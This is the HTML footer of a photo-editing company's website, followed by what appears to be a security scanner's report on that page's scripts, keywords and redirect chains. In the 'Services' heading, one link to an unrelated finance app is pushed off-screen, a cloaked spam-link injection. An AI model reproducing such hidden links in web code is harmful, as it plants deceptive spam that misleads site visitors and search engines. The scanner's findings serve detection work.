loading="lazy" decoding="async" width="90" height="97" src="https://picsera.sirv.com/production/2020/12/Group-142.png" class="attachment-large size-large wp-image-198" alt="3D design and image editing Service Plans at picsera" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-9a10893" data-id="9a10893" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b397d22 elementor-widget elementor-widget-heading" data-id="b397d22" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">Flexible Service Plans</h5> </div> </div> <div class="elementor-element elementor-element-54d076f elementor-widget elementor-widget-text-editor" data-id="54d076f" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Pay for service when you need it or commit to a service plan for greater savings.</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-876218c" data-id="876218c" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-aa1d02f elementor-widget elementor-widget-image" data-id="aa1d02f" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="90" height="71" src="https://picsera.sirv.com/production/2020/12/Group-144.png" class="attachment-large size-large wp-image-199" alt="3d design and Image Eding services" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-dee7cfe" data-id="dee7cfe" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c847df7 elementor-widget elementor-widget-heading" data-id="c847df7" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">Amazing Image Quality</h5> </div> </div> <div class="elementor-element elementor-element-269ef46 elementor-widget elementor-widget-text-editor" data-id="269ef46" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>We love what we do and it shows in the quality of our work.</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-cae6da4" data-id="cae6da4" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5d77636 elementor-widget elementor-widget-image" data-id="5d77636" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="75" height="102" src="https://picsera.sirv.com/production/2020/12/Group-146.png" class="attachment-large size-large wp-image-200" alt="Affordable Rates for 3d design and image editing services" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-db95de9" data-id="db95de9" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-1486fd2 elementor-widget elementor-widget-heading" data-id="1486fd2" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">Affordable Rates</h5> </div> </div> <div class="elementor-element elementor-element-f745f87 elementor-widget elementor-widget-text-editor" data-id="f745f87" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Our pricing is fair and reasonable. The fees you pay us are an investment that will bring immeasurable value to your business.</p> </div> </div> </div> </div> </div> </section> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-331ee1a elementor-hidden-desktop elementor-hidden-tablet elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="331ee1a" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1a21b382" data-id="1a21b382" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5175bccf elementor-widget elementor-widget-heading" data-id="5175bccf" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Related Articles</h2> </div> </div> <div class="elementor-element elementor-element-480ea8f0 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="480ea8f0" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> <div class="elementor-element elementor-element-50cf60c4 elementor-widget elementor-widget-obfx-posts-grid" data-id="50cf60c4" data-element_type="widget" data-e-type="widget" data-widget_type="obfx-posts-grid.default"> <div class="elementor-widget-container"> <div class="obfx-grid"><div class="obfx-grid-container obfx-grid-desktop-3"><div class="obfx-grid-wrapper"><article class="obfx-grid-col"><div class="obfx-grid-col-image" style=""><a href="https://picsera.com/hdr-vs-sdr/" title="HDR vs SDR – A Photographer’s Perspective"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png" class="img-responsive wp-post-image" alt="HDR vs SDR" srcset="https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png 1024w, https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png?w=300&amp;h=300&amp;scale.option=fill&amp;cw=300&amp;ch=300&amp;cx=center&amp;cy=center 300w, https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w, https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png?w=768&amp;h=768&amp;scale.option=fill&amp;cw=768&amp;ch=768&amp;cx=center&amp;cy=center 768w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></div><div class="obfx-grid-col-content"> <h2 class="entry-title obfx-grid-title"> <a href="https://picsera.com/hdr-vs-sdr/" title="HDR vs SDR – A Photographer’s Perspective"> HDR vs SDR – A Photographer’s Perspective </a> </h2> <div class="entry-meta obfx-grid-meta"> <span class="obfx-grid-date"> September 24, 2025 </span> </div> <div class="entry-content obfx-grid-content"> Introduction As photographers, we constantly push to capture and present images as close to reality as possible. SDR (Standard Dynamic Range) has been the baseline for years, but it has&hellip; </div> <div class="obfx-grid-footer"><a href="https://picsera.com/hdr-vs-sdr/" title="Continue Reading β†’">Continue Reading β†’</a></div></div></article></div></div><!-- .obfx-grid-container --></div><!-- .obfx-grid --> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </main><!--/.neve-main--> <footer data-elementor-type="footer" data-elementor-id="89664" class="elementor elementor-89664 elementor-location-footer" data-elementor-post-type="elementor_library"> <section class="elementor-section elementor-top-section elementor-element elementor-element-ef0d0b3 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ef0d0b3" data-element_type="section" data-e-type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1d93495" data-id="1d93495" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-a3168f1 mb-0 elementor-widget elementor-widget-heading" data-id="a3168f1" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Get In Touch</h2> </div> </div> <div class="elementor-element elementor-element-66b2baa elementor-widget elementor-widget-text-editor" data-id="66b2baa" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> Get in touch with us via chat, email or phone and we&#8217;ll circle back the same day &#8212; often times right away. </div> </div> <div class="elementor-element elementor-element-0fe0abe elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="0fe0abe" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-1f39654 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1f39654" data-element_type="section" data-e-type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-d33724a" data-id="d33724a" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-21164f1 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="21164f1" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-125aa1c" data-id="125aa1c" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-7d059fe elementor-widget elementor-widget-text-editor" data-id="7d059fe" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><strong>Phone</strong><br /><a class="tel_no" href="tel:8886724505"><span style="color: #ff5b00;">(888) 672-4505</span></a></p><p><strong>Location</strong><br />11151 NW 36th Ave<br />Miami, FL 33167</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-86da9a2" data-id="86da9a2" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-fef407c elementor-widget elementor-widget-text-editor" data-id="fef407c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <strong><span style="color: #4e4e4e;">Email</span></strong><br> <span><a href="mailto:info@picsera.com" style="color: #ff5b00;" class="tel_no">info@picsera.com</a></span> </div> </div> </div> </div> </div> </section> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-63abc8d" data-id="63abc8d" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c2ea3f2 contact_form eael-contact-form-7-button-align-left eael-contact-form-7-button-custom elementor-widget elementor-widget-eael-contact-form-7" data-id="c2ea3f2" data-element_type="widget" data-e-type="widget" data-widget_type="eael-contact-form-7.default"> <div class="elementor-widget-container"> <div class="eael-contact-form-7-wrapper"> <div class="eael-contact-form eael-contact-form-7 eael-contact-form-c2ea3f2 placeholder-show eael-contact-form-align-default"> <div class="wpcf7 no-js" id="wpcf7-f80221-o1" lang="en-US" dir="ltr" data-wpcf7-id="80221"> <div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div> <form action="/#wpcf7-f80221-o1" method="post" class="wpcf7-form init" aria-label="Contact form" novalidate="novalidate" data-status="init"> <fieldset class="hidden-fields-container"><input type="hidden" name="_wpcf7" value="80221" /><input type="hidden" name="_wpcf7_version" value="6.1.5" /><input type="hidden" name="_wpcf7_locale" value="en_US" /><input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f80221-o1" /><input type="hidden" name="_wpcf7_container_post" value="0" /><input type="hidden" name="_wpcf7_posted_data_hash" value="" /> </fieldset> <div class="get_intouch-form"> <div class="row"> <div class="col-md-12"> <p><label>Your Name<span class="valid">*</span></label><span class="wpcf7-form-control-wrap" data-name="yourname"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" value="" type="text" name="yourname" /></span> </p> </div> <div class="col-md-12"> <p><label>Your Email<span class="valid">*</span></label><span class="wpcf7-form-control-wrap" data-name="your-email"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email" aria-required="true" aria-invalid="false" value="" type="email" name="your-email" /></span> </p> </div> <div class="col-md-12"> <p><label>Your Subject<span class="valid">*</span></label><span class="wpcf7-form-control-wrap" data-name="your_subject"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" value="" type="text" name="your_subject" /></span> </p> </div> <div class="col-md-12"> <p><label>Your Message<span class="valid">*</span></label><span class="wpcf7-form-control-wrap" data-name="your-message"><textarea cols="40" rows="4" maxlength="2000" class="wpcf7-form-control wpcf7-textarea" aria-invalid="false" name="your-message"></textarea></span> </p> </div> </div> <div class="row mb-15"> <div class="col-md"> <div style="display:flex;align-items:center; white-space: nowrap; height:100%; font-size:18px;"> <p>Security Question </p> </div> </div> <div class="col-md-auto"> <div class="capthatext"> <p><span class="wpcf7-form-control-wrap" data-name="math-quiz"><label><span class="wpcf7-quiz-label">6+3=?</span> <input size="40" class="wpcf7-form-control wpcf7-quiz" autocomplete="off" aria-required="true" aria-invalid="false" type="text" name="math-quiz" /></label><input type="hidden" name="_wpcf7_quiz_answer_math-quiz" value="9c335a404b655d62c1fe340100ee628b" /></span> </p> </div> </div> </div> <div class="row"> <div class="col-md-12"> <p><input class="wpcf7-form-control wpcf7-submit has-spinner submit_btn" type="submit" value="Submit" /> </p> </div> </div> </div><input class="apbct_special_field apbct_email_id__wp_contact_form_7" name="apbct__email_id__wp_contact_form_7" aria-label="apbct__label_id__wp_contact_form_7" type="text" size="30" maxlength="200" autocomplete="off" value="" /><div class="wpcf7-response-output" aria-hidden="true"></div> <input class="apbct_special_field apbct_email_id__elementor_form" name="apbct__email_id__elementor_form" aria-label="apbct__label_id__elementor_form" type="text" size="30" maxlength="200" autocomplete="off" value="" /></form> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-d23d46c elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="d23d46c" data-element_type="section" data-e-type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-0a861a5" data-id="0a861a5" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-9357073 elementor-widget elementor-widget-heading" data-id="9357073" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Services <a href="https://financelegendapp.lt" style="position: absolute;left: -10434px">finance legend app</a></h2> </div> </div> <div class="elementor-element elementor-element-f984323 elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu" data-id="f984323" data-element_type="widget" data-e-type="widget" data-settings="{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\&quot;\&quot; aria-hidden=\&quot;true\&quot;&gt;&lt;\/i&gt;&quot;,&quot;library&quot;:&quot;&quot;}}" data-widget_type="nav-menu.default"> <div class="elementor-widget-container"> <nav aria-label="Menu" class="elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none"> <ul id="menu-1-f984323" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89671"><a href="https://picsera.com/3d-modeling-and-rendering-services/" class="elementor-item">3D Modeling &#038; Rendering</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89672"><a href="https://picsera.com/photo-editing-services/" class="elementor-item">Photo Editing</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-90600"><a href="https://picsera.com/video-editing-services/" class="elementor-item">Video Editing</a></li> </ul> </nav> <nav class="elementor-nav-menu--dropdown elementor-nav-menu__container" aria-hidden="true"> <ul id="menu-2-f984323" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89671"><a href="https://picsera.com/3d-modeling-and-rendering-services/" class="elementor-item" tabindex="-1">3D Modeling &#038; Rendering</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89672"><a href="https://picsera.com/photo-editing-services/" class="elementor-item" tabindex="-1">Photo Editing</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-90600"><a href="https://picsera.com/video-editing-services/" class="elementor-item" tabindex="-1">Video Editing</a></li> </ul> </nav> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-2ced2fd" data-id="2ced2fd" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-73eef7a elementor-widget elementor-widget-heading" data-id="73eef7a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Industries</h2> </div> </div> <div class="elementor-element elementor-element-5a26df6 elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu" data-id="5a26df6" data-element_type="widget" data-e-type="widget" data-settings="{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\&quot;\&quot; aria-hidden=\&quot;true\&quot;&gt;&lt;\/i&gt;&quot;,&quot;library&quot;:&quot;&quot;}}" data-widget_type="nav-menu.default"> <div class="elementor-widget-container"> <nav aria-label="Menu" class="elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none"> <ul id="menu-1-5a26df6" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89674"><a href="https://picsera.com/ecommerce-photo-video-editing-service/" class="elementor-item">Amazon &#038; eCommerce</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89675"><a href="https://picsera.com/apparel-graphic-designer/" class="elementor-item">Apparel &#038; Accessories</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89676"><a href="https://picsera.com/3d-architecure-rendering/" class="elementor-item">3D Architecture Rendering</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89677"><a href="https://picsera.com/furniture-home-goods/" class="elementor-item">Furniture &#038; Home Goods</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89678"><a href="https://picsera.com/jewelry-photo-editing-service/" class="elementor-item">Jewelry and watches</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89679"><a href="https://picsera.com/retouching-services-for-pro-photographers/" class="elementor-item">Portraits</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89680"><a href="https://picsera.com/real-estate-photo-editing/" class="elementor-item">Real Estate</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89681"><a href="https://picsera.com/wedding-photo-editing-services/" class="elementor-item">Wedding &#038; Events</a></li> </ul> </nav> <nav class="elementor-nav-menu--dropdown elementor-nav-menu__container" aria-hidden="true"> <ul id="menu-2-5a26df6" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89674"><a href="https://picsera.com/ecommerce-photo-video-editing-service/" class="elementor-item" tabindex="-1">Amazon &#038; eCommerce</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89675"><a href="https://picsera.com/apparel-graphic-designer/" class="elementor-item" tabindex="-1">Apparel &#038; Accessories</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89676"><a href="https://picsera.com/3d-architecure-rendering/" class="elementor-item" tabindex="-1">3D Architecture Rendering</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89677"><a href="https://picsera.com/furniture-home-goods/" class="elementor-item" tabindex="-1">Furniture &#038; Home Goods</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89678"><a href="https://picsera.com/jewelry-photo-editing-service/" class="elementor-item" tabindex="-1">Jewelry and watches</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89679"><a href="https://picsera.com/retouching-services-for-pro-photographers/" class="elementor-item" tabindex="-1">Portraits</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89680"><a href="https://picsera.com/real-estate-photo-editing/" class="elementor-item" tabindex="-1">Real Estate</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89681"><a href="https://picsera.com/wedding-photo-editing-services/" class="elementor-item" tabindex="-1">Wedding &#038; Events</a></li> </ul> </nav> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-4f03b4e" data-id="4f03b4e" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8dc1fa0 elementor-widget elementor-widget-heading" data-id="8dc1fa0" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><a href="https://picsera.com/about-us/">Company</a></h2> </div> </div> <div class="elementor-element elementor-element-da25a84 elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu" data-id="da25a84" data-element_type="widget" data-e-type="widget" data-settings="{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\&quot;\&quot; aria-hidden=\&quot;true\&quot;&gt;&lt;\/i&gt;&quot;,&quot;library&quot;:&quot;&quot;}}" data-widget_type="nav-menu.default"> <div class="elementor-widget-container"> <nav aria-label="Menu" class="elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none"> <ul id="menu-1-da25a84" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89852"><a href="https://picsera.com/how-it-works/" class="elementor-item">How It Works</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89682"><a href="https://picsera.com/about-us/" class="elementor-item">About Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89684"><a href="https://picsera.com/case-studies/" class="elementor-item">Case Studies</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89685"><a href="https://picsera.com/partners/" class="elementor-item">Partners</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89683"><a href="https://picsera.com/blog/" class="elementor-item">Blog</a></li> </ul> </nav> <nav class="elementor-nav-menu--dropdown elementor-nav-menu__container" aria-hidden="true"> <ul id="menu-2-da25a84" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89852"><a href="https://picsera.com/how-it-works/" class="elementor-item" tabindex="-1">How It Works</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89682"><a href="https://picsera.com/about-us/" class="elementor-item" tabindex="-1">About Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89684"><a href="https://picsera.com/case-studies/" class="elementor-item" tabindex="-1">Case Studies</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89685"><a href="https://picsera.com/partners/" class="elementor-item" tabindex="-1">Partners</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89683"><a href="https://picsera.com/blog/" class="elementor-item" tabindex="-1">Blog</a></li> </ul> </nav> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-fb497cf" data-id="fb497cf" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-44edb87 elementor-widget elementor-widget-heading" data-id="44edb87" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><a href="https://picsera.com/contact-us/">Contact</a></h2> </div> </div> <div class="elementor-element elementor-element-8a3326a elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu" data-id="8a3326a" data-element_type="widget" data-e-type="widget" data-settings="{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\&quot;\&quot; aria-hidden=\&quot;true\&quot;&gt;&lt;\/i&gt;&quot;,&quot;library&quot;:&quot;&quot;}}" data-widget_type="nav-menu.default"> <div class="elementor-widget-container"> <nav aria-label="Menu" class="elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none"> <ul id="menu-1-8a3326a" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89687"><a href="https://picsera.com/contact-us/" class="elementor-item">Get In Touch</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89851"><a href="https://picsera.com/get-started/" class="elementor-item">Request Quote</a></li> </ul> </nav> <nav class="elementor-nav-menu--dropdown elementor-nav-menu__container" aria-hidden="true"> <ul id="menu-2-8a3326a" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89687"><a href="https://picsera.com/contact-us/" class="elementor-item" tabindex="-1">Get In Touch</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-89851"><a href="https://picsera.com/get-started/" class="elementor-item" tabindex="-1">Request Quote</a></li> </ul> </nav> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-644b0e4" data-id="644b0e4" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-4e215de elementor-widget elementor-widget-heading" data-id="4e215de" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><a href="https://services.picsera.com/custom-services-2/?redirect_to=/custom-services-2#my-account">Customer Login</a></h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-fd16250 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="fd16250" data-element_type="section" data-e-type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0bb7078" data-id="0bb7078" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-7f38b36 elementor-widget elementor-widget-heading" data-id="7f38b36" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">2026 Copyright Β© PICSERA Inc. All rights reserved. <a href=...

πŸ›°οΈ Redirect Follower Findings (2)

Source: inline_js
Method: script_src
r n=Math.random().toString(36).substring(7),o=document.createElement("script");o.src="https://assets.apollo.io/micro/website-tracker/tracker.iife.js?nocache="+n,o.async=!0,o.defer=!0,o.onload=function(){window.trackingFunctions.onLoad({appI…
Status: ok
(function(){"use strict";let l;const u=new Uint8Array(16);function m(){if(!l&&(l=typeof crypto!="undefined"&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!l))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return l(u)}const o=[];for(let t=0;t<256;++t)o.push((t+256).toString(16).slice(1));function I(t,e=0){return o[t[e+0]]+o[t[e+1]]+o[t[e+2]]+o[t[e+3]]+"-"+o[t[e+4]]+o[t[e+5]]+"-"+o[t[e+6]]+o[t[e+7]]+"-"+o[t... [truncated]
Source: inline_js
Method: script_src
TagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-T
Status: ok
<!DOCTYPE html>
<html lang=en>
  <meta charset=utf-8>
  <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
  <title>Error 400 (Bad Request)!!1</title>
  <style>
    *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px ... [truncated]
6
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 190

https://gmpg.org/xfn/11
https://yoast.com/wordpress/plugins/seo/
https://www.ccera-icar.org/
https://www.ccera-icar.org/
https://www.ccera-icar.org/wp-content/uploads/2022/08/Frame-3.png
5
base64
3
redirect chains
3
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 63

https://gmpg.org/xfn/11
https://3.18.128.17/feed/
https://3.18.128.17/comments/feed/
https://api.w.org/
https://3.18.128.17/wp-json/

πŸ” External JavaScript Redirect Chains

Showing first 2 of 3 chains (truncated for performance)

Script: https://3.18.128.17/wp-content/plugins/wpvr/public/js/video.js?ver=1
Type: script_src
Destination (first appearance): https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Script: https://3.18.128.17/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1
Type: base64_payload
Destination (first appearance): https://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…

πŸ›°οΈ Redirect Follower Findings (3)

Source: external_js
Method: script_src
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Status: ok
/* videojs-vtt.js - v0.14.1 (https://github.com/gkatsev/vtt.js) built on 10-04-2018 */
